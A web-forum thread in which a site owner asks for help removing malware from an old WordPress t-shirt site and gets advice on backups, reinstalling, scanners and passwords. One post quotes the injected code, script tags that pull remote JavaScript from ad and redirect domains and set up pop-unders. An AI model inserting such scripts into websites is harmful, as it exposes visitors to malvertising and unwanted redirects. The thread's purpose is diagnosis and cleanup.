1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Clean a site with Malware?

Discussion in 'Programming' started by Thomas Scheetz, Mar 29, 2020.

  1. #1
    Anyone know how to clean a site with malware? My site funny-tshirts.com has it bad and I really can't afford $250 to clean it up.

    Thanks for any help.
    SEMrush
     
    Thomas Scheetz, Mar 29, 2020 IP
    SEMrush
  2. sarahk

    sarahk iTamer Staff

    Messages:
    26,241
    Likes Received:
    3,867
    Best Answers:
    108
    Trophy Points:
    665
    #2
    Delete it and restore from backup

    Delete the system files and upload a clean version.

    Go through every file looking for code that is out of place
     
    sarahk, Mar 29, 2020 IP
  3. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #3
    It was a old site that hasn't been hosted in almost a year. I just happened to have the files for it, so there isn't really anything I can do when it comes to restoring it. Going through files looking for code wouldn't be practical. I don't think I could "delete the system files and upload clean version". I was on the phone with my host "Host Gator" earlier when we were putting up my site and I think he did that, but it still has the malware.
     
    Thomas Scheetz, Mar 29, 2020 IP
  4. sarahk

    sarahk iTamer Staff

    Messages:
    26,241
    Likes Received:
    3,867
    Best Answers:
    108
    Trophy Points:
    665
    #4
    If it's an old site an you're not interested in the old content just delete the lot and start again.
     
    sarahk, Mar 29, 2020 IP
  5. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #5
    I'm gonna have to it looks like, but I wish I didn't have to do all that work again.
     
    Thomas Scheetz, Mar 30, 2020 IP
  6. SpacePhoenix

    SpacePhoenix Well-Known Member

    Messages:
    154
    Likes Received:
    21
    Best Answers:
    2
    Trophy Points:
    120
    #6
    Are you sure that you've not got a backup of the files that's known to be clean?

    btw: You should change your FTP password anyway, make sure that the new password is a strong one
     
    SpacePhoenix, Mar 30, 2020 IP
  7. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #7
    No backup. My host cleaned a lot of it today. It might be solved, but not sure yet. Site is up, not great, but up. Have to fix a bunch of stuff on it though.
     
    Thomas Scheetz, Mar 30, 2020 IP
  8. qwikad.com

    qwikad.com Illustrious Member Affiliate Manager

    Messages:
    6,410
    Likes Received:
    1,369
    Best Answers:
    24
    Trophy Points:
    400
    #8
    How long was the wait? A couple of days ago I tried to call regarding one of my sites and the wait was 92 minutes. I hope the whole virus thing is not going to further affect their customer service.
     
    qwikad.com, Mar 30, 2020 IP
  9. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #9
    With Host Gator? I've been on the phone with them several times and the wait has only been a couple minutes each time.
     
    Thomas Scheetz, Mar 30, 2020 IP
    qwikad.com likes this.
  10. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #10
    So I had to pretty much Delete everything on the host and the database and start over. I installed Wordpress from scratch. Before I did that, I used the basic tools in Wordpress and exported posts, pages, media, etc... I kept all that. When I opened the fresh install of my site, I went ahead and imported those files to see the results. I at least got to keep the main content. Well it looks like the malware is still there and obviously was in the exported files of my exported pages. It looks like they are in the pages and not the posts and I found the code that is the problem, but I can't tell where it starts and where it stops. Here is the code:

    #pl-2 .panel-grid .panel-grid-cell-mobile-last { margin-bottom:0px }  } </style><script type="text/javascript">
                var adlinkfly_url = 'https://funny-tshirts.com/';
                var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
                var adlinkfly_advert = 2;
                var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
            </script>
            <script src='//cutwin.com/js/full-page-script.js'></script>
            <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
    (function() {
        var configuration = {
        "token": "11f0dc1ed8453e409e04d86bea962f34",
        "exitScript": {
            "enabled": true
        },
        "popUnder": {
            "enabled": true
        }
    };
    Code (markup):

    Any idea? Most of this code is in there several times so I'm thinking if I can find where it starts and begins, I could delete it, save the code, and start all over again.
     
    Last edited by a moderator: Mar 30, 2020
    Thomas Scheetz, Mar 30, 2020 IP
  11. sarahk

    sarahk iTamer Staff

    Messages:
    26,241
    Likes Received:
    3,867
    Best Answers:
    108
    Trophy Points:
    665
    #11
    Unless you know the scripts referred to in lines 7 and 8 are clean I'd get rid of them

    pub2srv looks like it would be an ad publisher but redirects to
    hxxp://cobalten.com/apu.php?zoneid=683723
    Code (markup):
    and downloads a file with
    empty OK
    Code (markup):
    go mobisla downloaded a notice.php with this
    empty OK
    Code (markup):
    but I suspect when called from a webserver both scripts do something very, very nasty.
     
    sarahk, Mar 30, 2020 IP
  12. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #12
    Oh yeah, I know that code in 7&8 are definitely malware. I just don't know if I should delete anything before or after that. I'm not a coder, so I don't know how bad it would be or not be if I left incomplete code behind.
     
    Thomas Scheetz, Mar 30, 2020 IP
  13. Thomas Scheetz

    Thomas Scheetz Member

    Messages:
    31
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    38
    #13
    and these lines make me curious:
    var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';

    "token": "11f0dc1ed8453e409e04d86bea962f34",
     
    Thomas Scheetz, Mar 30, 2020 IP
  14. NetStar

    NetStar Notable Member

    Messages:
    2,444
    Likes Received:
    528
    Best Answers:
    21
    Trophy Points:
    245
    #14
    Clean a site with "malware"? How about you just review the code and remove anything malicious that you didn't write. And if you don't care about the site take it down and move the fuck on.
     
    NetStar, Mar 31, 2020 IP
  15. sarahk

    sarahk iTamer Staff

    Messages:
    26,241
    Likes Received:
    3,867
    Best Answers:
    108
    Trophy Points:
    665
    #15
    If the work had value the domain wouldn't have been parked for a year, right?

    I've been there, have been paying for a domain for years, the site had been hacked so hosting account was locked and I needed to contact the host's admin and negotiate to have it unlocked. In the end, I decided that none of the content mattered so I deleted it from my reseller panel and added it back in.
     
    sarahk, Mar 31, 2020 IP
  16. NetStar

    NetStar Notable Member

    Messages:
    2,444
    Likes Received:
    528
    Best Answers:
    21
    Trophy Points:
    245
    #16
    Same. And also if you use shared environments expect unexpected guests to infringe. I've had scripts people added code to with ads and redirects. What did I do? 1. restore my site from current back ups. (I have learned to back up the back up and the back and to do this over and over and often). 2. move out of a shared environment to at least a VPS or cloud account. If your site is important then it's worth the extra money. If you didn't back up your site then go through the code. If you don't have the time then pay someone else. If you don't have the money or the time than you have just realized how unimportant this site is. So take it down and move on.
     
    NetStar, Mar 31, 2020 IP
    sarahk likes this.
  17. georgenbowser

    georgenbowser Well-Known Member

    Messages:
    173
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    101
    #17
    Hi Thomas Scheetz,

    I am developer of Wordpress & PHP & having more than 7+ year exp

    your site don't have any malware
    https://sitecheck.sucuri.net/results/funny-tshirts.com
    https://www.siteguarding.com/

    you can even check on that
     
    georgenbowser, Apr 27, 2020 IP
  18. LewisH95

    LewisH95 Greenhorn

    Messages:
    102
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    23
    #18
    You can use tools that scan your site remotely to find malicious payloads and malware. Sucuri has a free WordPress plugin that you can find in the official WordPress repository.
     
    LewisH95, May 7, 2020 IP